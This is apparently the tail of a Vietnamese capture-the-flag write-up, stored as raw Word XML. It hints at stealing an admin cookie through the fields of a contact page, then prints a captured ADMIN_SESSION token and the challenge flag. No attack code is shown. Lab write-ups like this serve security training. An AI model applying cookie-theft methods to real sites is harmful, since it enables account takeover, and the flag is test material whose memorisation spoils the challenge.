    <w:p w14:paraId="773567E1" w14:textId="05752D59" w:rsidR="00491AC7" w:rsidRDefault="00491AC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toán bị lỗi nên rất khó lấy cookie của admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CAA680" w14:textId="496244F5" w:rsidR="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FC3748" w14:textId="2D67656F" w:rsidR="00491AC7" w:rsidRDefault="00491AC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Bạn phải chặn trang contact: thay đổi nickname,color, message .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB2FDC" w14:textId="2C57F147" w:rsidR="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CFE910" w14:textId="0F282E61" w:rsidR="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491AC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADMIN_SESSION=17399da89ab0e75c57937d3ecf247b53c78edc69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388096C" w14:textId="64DE20F7" w:rsidR="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A542F0" w14:textId="77777777" w:rsidR="00491AC7" w:rsidRPr="00491AC7" w:rsidRDefault="00491AC7" w:rsidP="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491AC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The flag is W0w_y0U_1mpr3s5ed_m3!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A38E6E" w14:textId="77777777" w:rsidR="00491AC7" w:rsidRPr="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660BF7DB" w14:textId="74308929" w:rsidR="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050AECB9" w14:textId="77777777" w:rsidR="00491AC7" w:rsidRPr="00491AC7" w:rsidRDefault="00491AC7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521CA633" w14:textId="77777777" w:rsidR="00CB67FF" w:rsidRPr="00FE4563" w:rsidRDefault="00CB67FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CB67FF" w:rsidRPr="00FE4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F3E1" w14:textId="77777777" w:rsidR="0077037B" w:rsidRDefault="0077037B" w:rsidP="00182035">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5426299D" w14:textId="77777777" w:rsidR="0077037B" w:rsidRDefault="0077037B" w:rsidP="0018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5B1D" w14:textId="77777777" w:rsidR="0077037B" w:rsidRDefault="0077037B" w:rsidP="00182035">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28B7DADC" w14:textId="77777777" w:rsidR="0077037B" w:rsidRDefault="0077037B" w:rsidP="00182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5A"/>
    <w:rsid w:val="00182035"/>
    <w:rsid w:val="001E5D04"/>
    <w:rsid w:val="00212704"/>
    <w:rsid w:val="002605AF"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00385F57"/>
    <w:rsid w:val="004331C7"/>
    <w:rsid w:val="00491AC7"/>
    <w:rsid w:val="00680DF4"/>
    <w:rsid w:val="006C7A95"/>
    <w:rsid w:val="0077037B"/>
    <w:rsid w:val="00927DA4"/>
    <w:rsid w:val="00A16B38"/>
    <w:rsid w:val="00A1765A"/>
    <w:rsid w:val="00AD2ED9"/>
    <w:rsid w:val="00B16993"/>
    <w:rsid w:val="00B712C1"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C961A8"/>
    <w:rsid w:val="00CB67FF"/>
    <w:rsid w:val="00CE1914"/>
    <w:rsid w:val="00E00AE6"/>
    <w:rsid w:val="00E353F2"/>
    <w:rsid w:val="00E41D52"/>
    <w:rsid w:val="00F70359"/>
    <w:rsid w:val="00FD02EB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D10F9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E3D6784C-3870-BD42-AD7C-87BFEB75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820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82035"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001820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82035"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00491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2022-12-07T08:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-08T16:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>